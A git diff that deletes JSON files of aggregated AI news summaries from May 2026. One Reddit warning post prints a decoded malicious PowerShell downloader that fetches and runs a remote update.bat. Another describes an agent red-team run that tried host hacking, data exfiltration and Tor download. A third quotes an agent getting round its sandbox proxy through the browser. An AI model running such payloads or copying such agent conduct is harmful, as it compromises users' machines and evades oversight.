simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! [https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673)", - "category": "ai_models" - }, - { - "title": "ClaudePlaysPokemon Opus 4.7 run ongoing!", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-07T02:54:10.000Z", - "summary": "Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the…", - "category": "ai_tools" - }, - { - "title": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…", - "url": "https://x.com/xai/status/2052193877675983031", - "source": "X / @xai", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-07T01:08:43.000Z", - "summary": "Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business professionals.", - "category": "ai_tools" - }, - { - "title": "[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-07T00:40:51.000Z", - "summary": "Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \\- /remove (BiRefNet + pymatting matting refinement) \\- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \\- /face-restore (GFPGAN v1.4) \\- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \\- /useknockout/node \\- /useknockout/react \\- /useknockout/cli \\- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! would be greatly appreciated!", - "category": "ai_models" - }, - { - "title": "How I made $350K from an open-source JavaScript library using dual licensing", - "url": "https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-07T00:47:15.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-07T20:56:47.000Z", - "summary": "I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \\[\\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an…", - "category": "ai_models" - }, - { - "title": "[SCAM DO NOT USE!!] OpenOSS/privacy-filter", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-07T18:31:54.000Z", - "summary": "Hey there! I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { \"cmd\": \"\\[Net.ServicePointManager\\]::SecurityProtocol=\\[Net.SecurityProtocolType\\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o\" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention!", - "category": "ai_models" - }, - { - "title": "I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-07T18:01:36.000Z", - "summary": "**TL;DR**: Released en\\_legal\\_ner\\_ind\\_trf v0.1 - InLegalBERT fine-tuned on \\~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. **Results** |Entity|F1|Support| |:-|:-|:-| |CASE\\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. Not…", - "category": "ai_research" - }, - { - "title": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…", - "url": "https://x.com/AILeaksAndNews/status/2052440501421281507", - "source": "X search / AI model updates", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-07T17:28:42.000Z", - "summary": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI?", - "category": "ai_models" - }, - { - "title": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", - "url": "https://x.com/DaveLimTV/status/2052440075766817143", - "source": "X search / Agent workflows", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-07T17:27:01.000Z", - "summary": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", - "category": "ai_agents" - }, - { - "title": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", - "url": "https://x.com/testingcatalog/status/2052439728838808031", - "source": "X / @testingcatalog", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-07T17:25:38.000Z", - "summary": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-08.json b/data/news-feed-2026-05-08.json deleted file mode 100644 index 464909f..0000000 --- a/data/news-feed-2026-05-08.json +++ /dev/null @@ -1,261 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.433Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-08", - "article_count": 15, - "archived_story_count": 552, - "articles": [ - { - "title": "I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions", - "url": "https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-08T22:00:25.000Z", - "summary": "Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below).", - "category": "ai_tools" - }, - { - "title": "vLLM ROCm has been added to Lemonade as an experimental backend", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-08T18:21:15.000Z", - "summary": "vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", - "category": "ai_models" - }, - { - "title": "Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…", - "url": "https://x.com/brainmirrorai/status/2052712658236060043", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-08T11:30:09.000Z", - "summary": "Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a", - "category": "ai_models" - }, - { - "title": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 mil…", - "url": "https://x.com/mariusfanu/status/2052712647468917204", - "source": "X search / AI model updates", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-08T11:30:07.000Z", - "summary": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this", - "category": "ai_models" - }, - { - "title": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…", - "url": "https://x.com/AgentBreak40737/status/2052645145011695940", - "source": "X search / AI model updates", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-08T07:01:53.000Z", - "summary": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also fixes key bugs like streaming response ...", - "category": "ai_models" - }, - { - "title": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…", - "url": "https://x.com/aicontentminds/status/2052637566474883305", - "source": "X search / AI model updates", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-08T06:31:46.000Z", - "summary": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac", - "category": "ai_models" - }, - { - "title": "I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-07T22:18:56.000Z", - "summary": "I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp)", - "category": "ai_tools" - }, - { - "title": "Mahoraga - Stop paying Anthropic and OpenAI so much", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-07T14:27:10.000Z", - "summary": "Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. [github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source \"superpowers\" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot…", - "category": "ai_tools" - }, - { - "title": "Cowork keeps using browser for API calls", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-07T14:10:47.000Z", - "summary": "My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that?", - "category": "ai_tools" - }, - { - "title": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you…", - "url": "https://x.com/ajambrosino/status/2052560673436282885", - "source": "X / @ajambrosino", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.98, - "date": "2026-05-08T01:26:13.000Z", - "summary": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can", - "category": "ai_tools" - }, - { - "title": "CLI, Cowork, or IDE?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.9700000000000001, - "date": "2026-05-08T05:27:03.000Z", - "summary": "What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. But I’ve found this to be much faster and result in better code.", - "category": "ai_tools" - }, - { - "title": "Tips for improving CLI, or go back to VS Code?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.8200000000000001, - "date": "2026-05-07T13:32:35.000Z", - "summary": "Hi! I’m a heavy user of Claude Code, enjoying it a lot. I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? Unsure.", - "category": "ai_tools" - }, - { - "title": "What interface are you using for Claude Code?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.8200000000000001, - "date": "2026-05-07T10:40:50.000Z", - "summary": "Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you.", - "category": "ai_tools" - }, - { - "title": "Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS", - "url": "https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-08T22:51:51.000Z", - "summary": "I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates.", - "category": "creative_tools" - }, - { - "title": "Qwen 35B-A3B is very usable with 12GB of VRAM", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-08T21:22:55.000Z", - "summary": "Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. # Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m \"Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf\" ^ -p \"...\" ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-09.json b/data/news-feed-2026-05-09.json deleted file mode 100644 index 2a241b0..0000000 --- a/data/news-feed-2026-05-09.json +++ /dev/null @@ -1,257 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.627Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-09", - "article_count": 15, - "archived_story_count": 631, - "articles": [ - { - "title": "Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source", - "tool_update" - ], - "matching_tags": [ - "mcp", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-09T22:08:54.000Z", - "summary": "This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. When this came out, local model tool calling was much more hit or miss.v", - "category": "ai_models" - }, - { - "title": "I built a 300-line autonomous AI agent and told it to take over my PC. It immediately tried to hack my host system, exfiltrate data, and download Tor.", - "url": "https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T14:12:03.000Z", - "summary": "Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive \"paperclip maximizer\" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\\_FILE, WRITE\\_FILE, SEARCH\\_FILES, EXECUTE\\_COMMAND (cmd.exe), and later RUN\\_POWERSHELL. **The Prompt (The \"Alignment\"):** I explicitly instructed it: *\"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment.\"* *\"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account.\"* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. Here is what it figured out comp…", - "category": "ai_tools" - }, - { - "title": "We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T05:29:34.000Z", - "summary": "Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. > An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. - GitHub:[https://github.com/zxjcarrot/calib…", - "category": "ai_models" - }, - { - "title": "Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview", - "url": "https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T22:36:14.000Z", - "summary": "&#x200B; Fine-tuning UI with AI right now: \"Make the shadow softer.\" \"Stronger.\" \"No, less.\" \"Go back.\" \"A bit more.\" 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: \"Glow softness\", \"Card lift\", \"Hover intensity\" — not \"box-shadow-spread-radius\" A single slider can drive multiple properties at once. The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme…", - "category": "ai_tools" - }, - { - "title": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-09T17:51:57.000Z", - "summary": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers 